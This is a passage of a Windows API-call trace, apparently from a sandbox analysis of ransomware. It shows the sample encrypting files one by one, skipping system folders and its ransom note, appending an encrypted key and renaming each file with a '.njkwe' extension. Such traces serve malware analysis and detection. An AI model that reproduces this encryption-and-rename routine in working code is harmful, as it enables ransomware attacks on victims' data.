(Ukraine)_i3$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0080.571] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\461__Connections_Cellular_Kyivstar (Ukraine)_i3$(__MVID)@WAP.provxml") returned 162 [0080.571] StrStrIW (lpFirst="461__Connections_Cellular_Kyivstar (Ukraine)_i3$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0080.571] lstrcmpW (lpString1="461__Connections_Cellular_Kyivstar (Ukraine)_i3$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.571] lstrcmpW (lpString1="461__Connections_Cellular_Kyivstar (Ukraine)_i3$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0080.571] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\461__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0080.571] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\461__Connections_Cellular_Kyivstar (Ukraine)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\461__connections_cellular_kyivstar (ukraine)_i3$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0080.572] GetTickCount () returned 0x1154756 [0080.572] GetTickCount () returned 0x1154756 [0080.572] GetTickCount () returned 0x1154756 [0080.572] GetTickCount () returned 0x1154756 [0080.572] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0080.572] GetProcessHeap () returned 0xbe0000 [0080.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0080.572] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0080.574] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.574] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0080.574] GetProcessHeap () returned 0xbe0000 [0080.574] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0080.574] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.574] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0080.574] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0080.574] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0080.574] CloseHandle (hObject=0x43c) returned 1 [0080.574] GetProcessHeap () returned 0xbe0000 [0080.574] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0080.574] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\461__Connections_Cellular_Kyivstar (Ukraine)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0080.574] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\461__Connections_Cellular_Kyivstar (Ukraine)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\461__connections_cellular_kyivstar (ukraine)_i3$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\461__Connections_Cellular_Kyivstar (Ukraine)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\461__connections_cellular_kyivstar (ukraine)_i3$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0080.575] GetProcessHeap () returned 0xbe0000 [0080.575] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0080.575] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91096761, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x91096761, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x91096761, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="462__Connections_Cellular_Kyivstar (Ukraine)_i4$(__MVID)@WAP.provxml", cAlternateFileName="462__C~1.PRO")) returned 1 [0080.576] lstrcmpiW (lpString1="462__Connections_Cellular_Kyivstar (Ukraine)_i4$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0080.576] lstrcmpiW (lpString1="462__Connections_Cellular_Kyivstar (Ukraine)_i4$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0080.576] lstrcmpiW (lpString1="462__Connections_Cellular_Kyivstar (Ukraine)_i4$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0080.576] lstrcmpiW (lpString1="462__Connections_Cellular_Kyivstar (Ukraine)_i4$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0080.576] lstrcmpiW (lpString1="462__Connections_Cellular_Kyivstar (Ukraine)_i4$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0080.576] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\462__Connections_Cellular_Kyivstar (Ukraine)_i4$(__MVID)@WAP.provxml") returned 162 [0080.576] StrStrIW (lpFirst="462__Connections_Cellular_Kyivstar (Ukraine)_i4$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0080.576] lstrcmpW (lpString1="462__Connections_Cellular_Kyivstar (Ukraine)_i4$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.576] lstrcmpW (lpString1="462__Connections_Cellular_Kyivstar (Ukraine)_i4$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0080.576] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\462__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0080.576] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\462__Connections_Cellular_Kyivstar (Ukraine)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\462__connections_cellular_kyivstar (ukraine)_i4$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0080.577] GetTickCount () returned 0x1154756 [0080.577] GetTickCount () returned 0x1154756 [0080.577] GetTickCount () returned 0x1154756 [0080.577] GetTickCount () returned 0x1154756 [0080.577] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0080.577] GetProcessHeap () returned 0xbe0000 [0080.577] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0080.577] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0080.578] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.578] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0080.583] GetProcessHeap () returned 0xbe0000 [0080.583] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0080.583] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.583] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0080.583] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0080.584] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0080.584] CloseHandle (hObject=0x43c) returned 1 [0080.584] GetProcessHeap () returned 0xbe0000 [0080.584] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0080.584] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\462__Connections_Cellular_Kyivstar (Ukraine)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0080.584] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\462__Connections_Cellular_Kyivstar (Ukraine)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\462__connections_cellular_kyivstar (ukraine)_i4$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\462__Connections_Cellular_Kyivstar (Ukraine)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\462__connections_cellular_kyivstar (ukraine)_i4$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0080.585] GetProcessHeap () returned 0xbe0000 [0080.585] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0080.585] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910bc9cd, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x910bc9cd, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x910bc9cd, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="463__Connections_Cellular_Astelit (Ukraine)_i0$(__MVID)@WAP.provxml", cAlternateFileName="463__C~1.PRO")) returned 1 [0080.585] lstrcmpiW (lpString1="463__Connections_Cellular_Astelit (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0080.585] lstrcmpiW (lpString1="463__Connections_Cellular_Astelit (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0080.585] lstrcmpiW (lpString1="463__Connections_Cellular_Astelit (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0080.585] lstrcmpiW (lpString1="463__Connections_Cellular_Astelit (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0080.585] lstrcmpiW (lpString1="463__Connections_Cellular_Astelit (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0080.585] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\463__Connections_Cellular_Astelit (Ukraine)_i0$(__MVID)@WAP.provxml") returned 161 [0080.585] StrStrIW (lpFirst="463__Connections_Cellular_Astelit (Ukraine)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0080.585] lstrcmpW (lpString1="463__Connections_Cellular_Astelit (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.585] lstrcmpW (lpString1="463__Connections_Cellular_Astelit (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0080.585] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\463__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0080.585] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\463__Connections_Cellular_Astelit (Ukraine)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\463__connections_cellular_astelit (ukraine)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0080.586] GetTickCount () returned 0x1154766 [0080.586] GetTickCount () returned 0x1154766 [0080.586] GetTickCount () returned 0x1154766 [0080.586] GetTickCount () returned 0x1154766 [0080.586] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0080.586] GetProcessHeap () returned 0xbe0000 [0080.586] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0080.586] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c0, lpOverlapped=0x0) returned 1 [0080.587] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.587] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c0, lpOverlapped=0x0) returned 1 [0080.587] GetProcessHeap () returned 0xbe0000 [0080.587] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0080.587] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.587] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0080.588] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0080.588] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0080.588] CloseHandle (hObject=0x43c) returned 1 [0080.588] GetProcessHeap () returned 0xbe0000 [0080.588] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0080.588] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\463__Connections_Cellular_Astelit (Ukraine)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0080.588] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\463__Connections_Cellular_Astelit (Ukraine)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\463__connections_cellular_astelit (ukraine)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\463__Connections_Cellular_Astelit (Ukraine)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\463__connections_cellular_astelit (ukraine)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0080.589] GetProcessHeap () returned 0xbe0000 [0080.589] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0080.589] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910bc9cd, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x910bc9cd, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x910bc9cd, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x281, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="464__Connections_Cellular_UMC (Ukraine)_i0$(__MVID)@WAP.provxml", cAlternateFileName="464__C~1.PRO")) returned 1 [0080.589] lstrcmpiW (lpString1="464__Connections_Cellular_UMC (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0080.589] lstrcmpiW (lpString1="464__Connections_Cellular_UMC (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0080.589] lstrcmpiW (lpString1="464__Connections_Cellular_UMC (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0080.589] lstrcmpiW (lpString1="464__Connections_Cellular_UMC (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0080.589] lstrcmpiW (lpString1="464__Connections_Cellular_UMC (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0080.589] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\464__Connections_Cellular_UMC (Ukraine)_i0$(__MVID)@WAP.provxml") returned 157 [0080.589] StrStrIW (lpFirst="464__Connections_Cellular_UMC (Ukraine)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0080.589] lstrcmpW (lpString1="464__Connections_Cellular_UMC (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.589] lstrcmpW (lpString1="464__Connections_Cellular_UMC (Ukraine)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0080.589] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\464__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0080.589] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\464__Connections_Cellular_UMC (Ukraine)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\464__connections_cellular_umc (ukraine)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0080.589] GetTickCount () returned 0x1154766 [0080.589] GetTickCount () returned 0x1154766 [0080.589] GetTickCount () returned 0x1154766 [0080.589] GetTickCount () returned 0x1154766 [0080.589] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0080.589] GetProcessHeap () returned 0xbe0000 [0080.590] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0080.590] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x281, lpOverlapped=0x0) returned 1 [0080.591] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.591] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x281, lpOverlapped=0x0) returned 1 [0080.591] GetProcessHeap () returned 0xbe0000 [0080.591] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0080.591] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.591] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0080.592] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0080.592] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0080.592] CloseHandle (hObject=0x43c) returned 1 [0080.592] GetProcessHeap () returned 0xbe0000 [0080.592] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0080.592] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\464__Connections_Cellular_UMC (Ukraine)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 177 [0080.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\464__Connections_Cellular_UMC (Ukraine)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\464__connections_cellular_umc (ukraine)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\464__Connections_Cellular_UMC (Ukraine)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\464__connections_cellular_umc (ukraine)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0080.593] GetProcessHeap () returned 0xbe0000 [0080.593] HeapFree (in: 